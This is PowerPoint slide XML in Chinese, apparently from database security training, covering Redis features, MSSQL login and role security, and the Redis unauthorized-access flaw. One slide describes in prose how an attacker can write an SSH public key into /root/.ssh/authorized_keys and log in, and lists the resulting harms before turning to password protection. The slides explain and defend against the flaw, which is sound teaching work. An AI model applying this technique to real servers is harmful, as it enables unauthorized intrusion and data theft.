              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(SORT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>等高级功能，在实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>INCR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SETNX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>等功能的时候，保证了其操作的原子性，除此以外，还支持主从复制等功能。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>以消息队列的形式存在，作为内嵌的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>List</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>存在，满足实时的高并发需求。</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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327791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4896544"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>实例级别的安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>采用了标准</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>登录和集成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>登录两种方式。无论使用哪种登录方式，用户在登录时必须提供登录密码和账号，管理和设计合理的登录方式是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库管理员的重要任务，也是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>安全体系中重要的组成部分。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器中预先设定了许多固定服务器的角色，用来为具有服务器管理员资格的用户分配使用权利，固定服务器角色的成员可以用于服务器级的管理权限。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库级别的安全机制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>在建立用户的登录账号信息时，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>提示用户选择默认的数据库，并分配给用户权限，以后每次用户登录服务器后，都会自动转到默认数据库上。对任何用户来说，如果在设置登录账号时没有指定默认数据库，则用户的权限将限制在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>master</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库以内。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>允许用户在数据库上建立新的角色，然后为该角色授予多个权限，最后通过角色将权限赋予</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>mssql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的用户，使其他用户获取具体数据库的操作权限。</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安全机制介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2702090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Redis</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en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>优点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>1.Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>能支持超过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>100K+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>每秒的读写频率。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>2.Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>支持二进制案例的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Strings, Lists, Hashes, Sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Ordered Sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据类型操作。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>     3.Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的所有操作都是原子性的，同时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>还支持对几个操作全并后的原子性执行。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>     4.Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>还支持 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>publish/subscribe, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>通知</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>过期等等特性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>缺点</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>      数据库容量受到物理内存的限制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>不能用作海量数据的高性能读写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>适合的场景主要局限在较  小数据量的高性能操作和运算上。</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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>介绍</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2326281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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库</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知识子域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695400" y="1628800"/>
            <a:ext cx="3600400" cy="3849292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>默认情况下，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis-servier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>会以非</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>daemon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>方式运行，默认服务端口为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>6379.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>运行权限和运行端口</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D0C2E9C-CC21-4A49-A175-C6A3698A6D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect t="17848"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4871864" y="1628800"/>
            <a:ext cx="6342857" cy="4365765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9674638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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库</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知识子域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695400" y="1556792"/>
            <a:ext cx="10972800" cy="4680520"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>未授权访问漏洞描述：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>默认情况下，会绑定在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>0.0.0.0:6379</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>，这样将会将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务暴露到公网上，如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>以及读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的数据。利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>自身的相关方法，可以进行写文件操作，攻击者可以成功将自己的公钥写入目标服务器的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>/root/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>文件夹的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>authotrized_keys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>文件中，进而可以直接登录目标服务器。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>未授权访问漏洞危害：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>数据库数据泄露（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>作为数据库，保存着各种各样的数据，如果存在未授权访问的情况，将会导致数据的泄露，其中包含保存的用户信息等）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>代码执行（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>可以嵌套</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>Lua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>脚本的特性将会导致代码执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>危害同其他服务器端的代码执行）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>敏感信息泄露（通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>INFO </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>命令可以查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务器的信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>有当前 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>内存运行状态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>服务端个数等等敏感信息。）</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51057"/>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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>未授权访问的危害</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3612380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Redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>数据库</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知识子域</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="内容占位符 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695400" y="1628800"/>
            <a:ext cx="10972800" cy="3849292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>redis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>添加密码验证</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
